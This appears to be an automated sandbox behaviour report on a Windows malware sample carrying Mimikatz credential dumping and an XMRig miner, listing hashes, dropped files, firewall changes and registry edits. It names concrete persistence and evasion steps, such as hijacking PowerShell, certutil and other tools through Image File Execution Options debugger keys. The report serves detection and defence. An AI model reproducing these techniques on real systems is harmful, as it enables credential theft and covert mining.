Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
14-02-2025 05:36
Behavioral task
behavioral1
Sample
2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20250207-en
General
-
Target
2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe
-
Size
7.6MB
-
MD5
91d483af28933f21bd2d40990c33852a
-
SHA1
7932b38c6611f7f86756c6b5c9ef90abb1247ba0
-
SHA256
3e3cce2d2f735590d8111b0813acfec3a1f99efcd3cf6aa52f803514c592583e
-
SHA512
1e023559670511325ae1849aca55dd27125c42109569ca9a3573b08619b26bbe53f81bf81438a87eade8ac930d21ca1e7ed18a483970ff9d1ed921c19507d3c0
-
SSDEEP
196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3668 created 2144 3668 zluvegc.exe 38 -
Xmrig family
-
Contacts a large (21578) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/2072-176-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-181-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-201-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-211-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-219-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-232-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-235-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-242-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-247-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-251-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-260-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig behavioral2/memory/2072-261-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 3 IoCs
resource yara_rule behavioral2/memory/2072-3-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023e41-5.dat mimikatz behavioral2/memory/3676-136-0x00007FF744680000-0x00007FF74476E000-memory.dmp mimikatz -
Downloads MZ/PE file 1 IoCs
flow pid Process 26 4744 Process not Found -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts zluvegc.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts zluvegc.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zluvegc.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4404 netsh.exe 1848 netsh.exe -
Executes dropped EXE 27 IoCs
pid Process 876 zluvegc.exe 3668 zluvegc.exe 2320 wpcap.exe 4016 tuykeyttq.exe 3676 vfshost.exe 1888 qitenlbei.exe 4024 xohudmc.exe 4200 wooakm.exe 2072 dgkdfz.exe 4840 qitenlbei.exe 4232 qitenlbei.exe 4140 qitenlbei.exe 4916 qitenlbei.exe 3888 qitenlbei.exe 2664 qitenlbei.exe 3836 qitenlbei.exe 3524 zluvegc.exe 2308 qitenlbei.exe 760 qitenlbei.exe 4112 qitenlbei.exe 3928 qitenlbei.exe 4232 qitenlbei.exe 5076 qitenlbei.exe 4608 qitenlbei.exe 3492 qitenlbei.exe 1064 yqvyfiien.exe 4232 zluvegc.exe -
Loads dropped DLL 12 IoCs
pid Process 2320 wpcap.exe 2320 wpcap.exe 2320 wpcap.exe 2320 wpcap.exe 2320 wpcap.exe 2320 wpcap.exe 2320 wpcap.exe 2320 wpcap.exe 2320 wpcap.exe 4016 tuykeyttq.exe 4016 tuykeyttq.exe 4016 tuykeyttq.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 76 ifconfig.me 75 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\wooakm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\wooakm.exe xohudmc.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zluvegc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zluvegc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zluvegc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\784700AA06C14673B71475D3E7526C8A zluvegc.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zluvegc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zluvegc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zluvegc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zluvegc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zluvegc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\784700AA06C14673B71475D3E7526C8A zluvegc.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zluvegc.exe -
resource yara_rule behavioral2/memory/3676-133-0x00007FF744680000-0x00007FF74476E000-memory.dmp upx behavioral2/files/0x0007000000023e80-134.dat upx behavioral2/memory/3676-136-0x00007FF744680000-0x00007FF74476E000-memory.dmp upx behavioral2/memory/1888-140-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/files/0x0007000000023e8b-139.dat upx behavioral2/memory/1888-153-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/2072-163-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/files/0x0007000000023e88-162.dat upx behavioral2/memory/4840-170-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/4232-174-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/2072-176-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/4140-179-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/2072-181-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/4916-184-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/3888-188-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/2664-192-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/3836-196-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/2072-201-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/2308-204-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/760-208-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/2072-211-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/4112-213-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/3928-217-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/2072-219-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/4232-222-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/5076-226-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/4608-231-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/2072-232-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/3492-234-0x00007FF62AF00000-0x00007FF62AF5B000-memory.dmp upx behavioral2/memory/2072-235-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/2072-242-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/2072-247-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/2072-251-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/2072-260-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx behavioral2/memory/2072-261-0x00007FF6C36C0000-0x00007FF6C37E0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\beabtyubr\ihivhqini\Packet.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\svschost.exe zluvegc.exe File created C:\Windows\yibeuvqk\spoolsrv.xml zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\schoedcl.xml zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\coli-0.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\libxml2.dll zluvegc.exe File opened for modification C:\Windows\yibeuvqk\docmicfg.xml zluvegc.exe File created C:\Windows\beabtyubr\ihivhqini\tuykeyttq.exe zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\schoedcl.exe zluvegc.exe File opened for modification C:\Windows\yibeuvqk\vimpcsvc.xml zluvegc.exe File opened for modification C:\Windows\yibeuvqk\zluvegc.exe 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe File created C:\Windows\beabtyubr\ihivhqini\Packet.dll zluvegc.exe File created C:\Windows\beabtyubr\ihivhqini\yqvyfiien.exe zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\tibe-2.dll zluvegc.exe File created C:\Windows\beabtyubr\ihivhqini\scan.bat zluvegc.exe File opened for modification C:\Windows\yibeuvqk\spoolsrv.xml zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\spoolsrv.xml zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\vimpcsvc.xml zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\cnli-1.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\crli-0.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\posh-0.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\ucl.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\docmicfg.exe zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\vimpcsvc.xml zluvegc.exe File created C:\Windows\beabtyubr\Corporate\mimidrv.sys zluvegc.exe File created C:\Windows\beabtyubr\ihivhqini\wpcap.exe zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\zlib1.dll zluvegc.exe File created C:\Windows\yibeuvqk\svschost.xml zluvegc.exe File created C:\Windows\beabtyubr\Corporate\vfshost.exe zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\vimpcsvc.exe zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\docmicfg.xml zluvegc.exe File opened for modification C:\Windows\yibeuvqk\svschost.xml zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\AppCapture64.dll zluvegc.exe File opened for modification C:\Windows\beabtyubr\Corporate\log.txt cmd.exe File created C:\Windows\beabtyubr\UnattendGC\specials\trch-1.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\trfo-2.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\svschost.xml zluvegc.exe File created C:\Windows\yibeuvqk\schoedcl.xml zluvegc.exe File created C:\Windows\beabtyubr\upbdrjv\swrpwe.exe zluvegc.exe File created C:\Windows\yibeuvqk\vimpcsvc.xml zluvegc.exe File created C:\Windows\beabtyubr\Corporate\mimilib.dll zluvegc.exe File created C:\Windows\ime\zluvegc.exe zluvegc.exe File created C:\Windows\beabtyubr\ihivhqini\wpcap.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\tucl-1.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\schoedcl.xml zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\svschost.xml zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\AppCapture32.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\spoolsrv.exe zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\Shellcode.ini zluvegc.exe File opened for modification C:\Windows\beabtyubr\ihivhqini\Result.txt yqvyfiien.exe File created C:\Windows\beabtyubr\UnattendGC\specials\libeay32.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\docmicfg.xml zluvegc.exe File created C:\Windows\yibeuvqk\zluvegc.exe 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe File created C:\Windows\beabtyubr\UnattendGC\specials\xdvl-0.dll zluvegc.exe File opened for modification C:\Windows\yibeuvqk\schoedcl.xml zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\exma-1.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\specials\ssleay32.dll zluvegc.exe File created C:\Windows\beabtyubr\UnattendGC\spoolsrv.xml zluvegc.exe File created C:\Windows\yibeuvqk\docmicfg.xml zluvegc.exe File created C:\Windows\beabtyubr\ihivhqini\ip.txt zluvegc.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1228 sc.exe 2380 sc.exe 2664 sc.exe 3444 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wooakm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zluvegc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key 